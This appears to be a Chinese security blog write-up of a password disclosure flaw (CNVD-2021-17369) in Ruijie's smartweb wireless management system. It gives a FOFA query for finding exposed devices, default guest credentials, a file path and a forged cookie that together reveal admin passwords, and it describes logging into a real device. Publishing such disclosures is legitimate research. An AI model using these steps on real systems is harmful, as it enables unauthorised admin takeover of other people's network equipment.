一:漏洞描述🐑
锐捷网络股份有限公司无线smartweb管理系统存在逻辑缺陷漏洞,攻击者可从漏洞获取到管理员账号密码,从而以管理员权限登录。
二: 漏洞影响🐇
锐捷网络股份有限公司 无线smartweb管理系统
三: 漏洞复现🐋
FOFA: title="无线smartWeb--登录页面"
登录页面如下
然后找到了一个设备存在管理admin员的弱口令,进去后发现Web CLI控制台
翻文件的过程中发现一个文件很有意思,运行命令查看
more /web/xml/webuser-auth.xml
里面存在所有人的账号密码
默认存在 guest账户,账号密码为 guest/guest
其中登录的过程中搜索admin的数据后发现请求了一个文件 /web/xml/webuser-auth.xml,而且响应中包含了 admin密码的base64加密
解密就可以获得 admin管理员的密码,尝试直接请求
http://xxx.xxx.xxx.xxx/web/xml/webuser-auth.xml
Cookie添加
Cookie: login=1; oid=1.3.6.1.4.1.4881.1.1.10.1.3; type=WS5302; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest
四: Goby & POC🦉
已上传 https://github.com/PeiQi0/PeiQi-WIKI-POC Goby & POC 目录中
Ruijie_smartweb_password_information_disclosure
五: 关于文库🦉
在线文库:
http://wiki.peiqi.tech
Github:
https://github.com/PeiQi0/PeiQi-WIKI-POC
最后
下面就是文库和团队的公众号啦,更新的文章都会在第一时间推送在交流群和公众号,想要投稿的加我一起建设文库~
想要加入交流群的师傅公众号点击交流群加我拉你啦~
别忘了Github下载完给个小星星⭐
同时知识星球也开放运营啦,希望师傅们支持支持啦🐟
知识星球里会持续发布一些漏洞公开信息和技术文章~
本文始发于微信公众号(PeiQi文库):锐捷Smartweb管理系统 密码信息泄露漏洞 CNVD-2021-17369 (1day~)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论